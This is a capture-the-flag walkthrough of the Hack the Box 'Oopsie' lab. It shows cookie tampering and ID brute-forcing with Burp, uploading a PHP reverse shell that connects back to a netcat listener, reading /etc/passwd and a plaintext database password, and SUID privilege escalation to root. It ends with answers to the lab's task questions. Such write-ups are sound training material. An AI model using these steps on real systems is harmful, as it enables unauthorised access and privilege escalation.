#13 Oopsie - Starting Point - Hack the Box || Complete Walkthrough

Whenever you are performing a web assessment that includes authentication mechanisms, it's always advised to check cookies, and sessions, and try to figure out “How access control really work?”. 


Introduction

In many cases, a Remote Code Execution attack and a foothold on the system might not be achievable by itself, but rather after chaining different types of vulnerabilities and exploits.


In this session, we are going to learn about Information Disclosure and Broken Access Control types of vulnerabilities even though they seem not very important. It can have a great impact while attacking a system, and thus why even small vulnerabilities matter.


Pre-requisite

Before you start to enumerate the target you must install the below tools:

 

Enumeration

Find the target IP by clicking on "Spawn Machine".


We are going to start our enumeration by searching for any open ports using the Nmap tool:

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.4.38
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-28 23:43 IST
Nmap scan report for 10.129.4.38
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.23 seconds
┌──(mrdev㉿mrdev)-[~]
└─$ 

We can spot port 22 (SSH), and port 80 (HTTP) as open. We visit the IP using the web browser where we face a website for automotive.

On the homepage, it is possible to locate interesting information about how one can access the services through login:

According to this information, the website should have a login page. Before we proceed with the directory and page enumeration, we can try to map the website by using the Burp Suite proxy to passively spider the website.

  • Learn More: 

Burp Suite Web Crawler, Scanner, Proxy, Intruder

This article explores the features of Burp Suite, a popular cybersecurity tool used for web application security testing. It covers its web crawler, scanner, proxy, and intruder functionalities, which are essential for identifying vulnerabilities and securing web applications.


Intercept the Web Data using Burpsuite

First, we will start Burp Suite, and configure the browser to send traffic through the proxy. Navigate to Proxy Tab, and under Intercept, the sub-tab selects the button where Intercept is off so to enable it.

Now click on the Foxy Proxy extension, and Enable Burp Suite Proxy.

Now that everything is set up correctly, let’s refresh the page in our browser. Now switch to Burp suite and forward the http request. 

Switch to the Target tab and then to the Sitemap option. It is possible to spot some directories and files that weren't visible while browsing. One that is indeed very interesting it's the directory of login.

It is possible to spot some directories and files that weren't visible while browsing. One that is indeed very interesting it's the directory of /cdn-cgi/login

We can visit it in our browser and indeed we are presented with the login page:

As we have no valid credentials to get login access. But, there is also an option to log in as a Guest. 

Trying that and now we are presented with a couple of new navigation options as we are logged in as guests.

After navigating through the available pages, we spot that the only interesting one seems to be the Uploads. However, it is not possible to access it as we need to have super admin rights.

Now, we need to find a way to escalate our privileges from user Guest to super admin role. One way to try this is by checking if cookies and sessions can be manipulated.


Identifying Users via Intruder Attack with Burp Suite

Let's examine the portal further in Burp. We refresh the Accounts page, which displays the user ID for our current user and intercepts the request. We notice what seems to be a custom cookie implementation, comprising of the user value and role. We also noticed the id parameter, which for our current admin user is 2.

It might be possible to brute force the ID values and display the user value for another user, such as the super admin account. We can do this using Burp's Intruder module. Click CTRL + I to send the request to Intruder.

Click on Position and press Clear to remove the pre-populated payload positions:

Select the ID value (2) , and click Add . Next, click on the Payloads tab:

We can generate a sequential list of 1 to 100 using a simple bash loop using an online bash compiler (Click Here).

for i in `seq 1 100`; do echo $i; done

Paste the output into the payload box:

Next, click on the Options tab, ensure that Follow Redirections is set to " Always ", and select the option to " Process cookies in redirections ".

Now, click on the Target tab, and then click Start Attack. 

Sort responses by Length and view the results. A few of the responses have a different length, and we proceed to examine them. The super admin account is visible, and the corresponding user value is identified.


There are two admins that I have found by using the brute-forcing attack. After a try, I found that id 1 is admin and id 30 is super admin. I think, there is a mistake with this machine. The upload is only possible with the admin with ID 1.

Let's try to access the Uploads page again, substituting our user value with the admin:

It is possible to view and change cookies in Mozilla Firefox through the usage of Developer Tools. 

Developer tools are a set of web developer tools built into Firefox. You can use them to examine, edit, and debug HTML, CSS, and JavaScript.

In order to enter the Developer Tools panel, we need to right-click in the content of the webpage and select the Inspect Element(Q).

Then we can navigate to the Storage section where Cookies are being presented. Indeed we have an information disclosure vulnerability, which we might be able to abuse. We now know the access ID of the admin user thus we can try to change the values in our cookie through the Developer tools so the user value is 34322 and the role value is admin

Then we can revisit the Uploads page.

We finally got access to the upload form.


Foothold

Now that we have access to the upload form we can attempt to upload a PHP reverse shell. 


Establish Server Access Using PHP Reverse Shell

Instead of creating our own one, we will use an existing one. You can find the code from GitHub


PHP Reverse Shell

This repository contains a PHP script for generating a reverse shell. Reverse shells are commonly used in penetration testing and security assessments to gain remote access to a system. This PHP script can be used to establish a reverse shell connection to a target machine.


Copy this code and paste it to Notepad or Notepad++.


Now, modify the code so it can suit our needs. We are going to change the Listening Host IP($ip={openVPN IP}) and the Listening port variables($port=4444) to match our settings and then we will attempt to upload the file.

We finally managed to upload it. Now we might need to brute-force directories in order to locate the folder where the uploaded files are stored but we can also guess it. 

The uploads directory seems to be a logical assumption. We confirm that by running also the gobuster tool.

┌──(mrdev㉿mrdev)-[~]
└─$ gobuster dir -u 10.129.4.38 -w dirbuster/directory-list-2.3-small.txt -x php 
===============================================================   
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
=============================================================== 
[+] Url:                     http://10.129.4.38 
[+] Method:                  GET  
[+] Threads:                 10
[+] Wordlist:                dirbuster/directory-list-2.3-small.txt    
[+] Negative Status codes:   404  
[+] User Agent:              gobuster/3.1.0   
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/29 00:09:07 Starting gobuster in directory enumeration mode  
=============================================================== 
/images               (Status: 301) [Size: 311] [--> http://10.129.4.38/images/]
/index.php            (Status: 200) [Size: 10932]  
/themes               (Status: 301) [Size: 311] [--> http://10.129.4.38/themes/] 
/uploads              (Status: 301) [Size: 312] [--> http://10.129.4.38/uploads/]   
Progress: 1040 / 175330 (0.59%)
^Z
[1]+  Stopped 

The gobuster immediately found the /uploads directory. But, we don't have permission to access the directory but we can try to access our uploaded file. Before that make sure, we will need to set up a Netcat connection.

Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
D:\netcat-win32-1.11_1\netcat-1.11> nc -lvnp 4444
listening on [any] 4444 ...

Then request our shell through the browser ( http://{target IP}/uploads/php-reverse-shell.php ).

Go back to the Netcat listener and find out if the connection is established or not.

Note: In case our shell is not there it might have been deleted so we need to upload it again.

connect to [10.10.14.183] from (UNKNOWN) [10.129.4.38] 52408
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 
18:53:49 up 31 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We got a reverse shell! In order to have a functional shell though we can issue a python3 TTY cheat sheet .

$ python3 -c 'import pty; pty.spawn("bin/bash")' 
www-data@oopsie:/$ whoami
whoami 
www-data
www-data@oopsie:/$

As the user of www-data, we can't achieve many things as the role has restricted access to the system.

We can check the available users on the system by reading the /etc/passwd file so we can try a password reuse of this password.

www-data@oopsie:/$ cat /etc/passwd 
cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin 
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin 
apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin  
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false 
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash  
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false  
www-data@oopsie:/$

We found a new user named, Robert. You can find the user flag from the /home/robert directory.

www-data@oopsie:/$ cd /home/robert
cd /home/robert    
www-data@oopsie:/home/robert$ ls   
ls  user.txt
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74e*************************1
www-data@oopsie:/home/robert$

Since the website is making use of PHP and SQL, we can enumerate further the web directory for potential disclosures or misconfigurations. After some search, we can find some interesting php files under /var/www/html/cdn-cgi/login directory.

www-data@oopsie:/home/robert$ cd ../../
cd ../../
www-data@oopsie:/$ ls  
ls
bin    dev   initrd.img      lib64       mnt   root  snap  tmp  vmlinuz
boot   etc   initrd.img.old  lost+found  opt   run   srv   usr  vmlinuz.old
cdrom  home  lib             media       proc  sbin  sys   var  
www-data@oopsie:/$ cd var/www/html/cdn-cgi/login
cd var/www/html/cdn-cgi/login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls   
ls 
admin.php  db.php   index.php  script.js  
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php  
<?php  
$conn = mysqli_connect('localhost',' robert ',' M3g4C0rpUs3r! ','garage');
?>  
www-data@oopsie:/var/www/html/cdn-cgi/login$

Now that we got the password we can successfully log in:

www-data@oopsie:/var/www/html/cdn-cgi/login$ cd ../../../../../
cd ../../../../../ 
www-data@oopsie:/$ su robert
su robert
Password: M3g4C0rpUs3r!   
robert@oopsie:/$ whoami
whoami
robert
robert@oopsie:/$

we can successfully log in.


Privilege Escalation

Before running any privilege escalation or enumeration script, let's check the basic commands for elevating privileges like sudo and id.

robert@oopsie:/$ sudo -l   
sudo -l
[sudo] password for robert: M3g4C0rpUs3r!  
Sorry, user robert may not run sudo on oopsie.
robert@oopsie:/$ id 
id 
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:/$

We observe that user Robert is part of the group bug tracker. 


Exploiting Privilege Escalation Vulnerability in Bugtracker

Let's try to see if there is any binary within that group. We found a file named bug tracker. We check what privileges and what type of file is it.

robert@oopsie:/$ locate bugtracker  
locate bugtracker
/usr/bin/bugtracker 
robert@oopsie:/$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker    
ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), 
dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, 
BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
robert@oopsie:/$

There is a suid set on that binary, which is a promising exploitation path. Now, we will execute the bug tracker and provide bug ID: 2. 

robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker      
------------------ 
: EV Bug Tracker : 
------------------  
Provide Bug ID: 2   
2    
---------------  
# whoami 
whoami
root    

As you can see we got root permissions. The root flag can be found in the /root folder.

# cd /root  
cd /root
# ls  
ls 
reports  root.txt    
# /bin/cat root.txt
/bin/cat root.txt
af1*************************acf 

We got both the flags, congratulations!


Task Answer


TASK 1: With what kind of tool can intercept web traffic?

Ans. proxy


TASK 2: What is the path to the directory on the web server that returns a login page?

Ans. /cdn-cgi/login

TASK 3: What can be modified in Firefox to get access to the upload page?

Ans. cookie

TASK 4: What is the access ID of the admin user?

Ans. 34322

TASK 5: On uploading a file, what directory does that file appear in on the server?

Ans. /uploads

TASK 6: What is the file that contains the password that is shared with the robert user?

Ans. db.php

TASK 7: What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?

Ans. find

TASK 8: Regardless of which user starts running the bugtracker executable, what's user privileges will be used to run?

Ans. root


TASK 9: What SUID stands for?

Ans. Set owner User ID


TASK 10: What is the name of the executable being called in an insecure manner?

Ans. cat

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!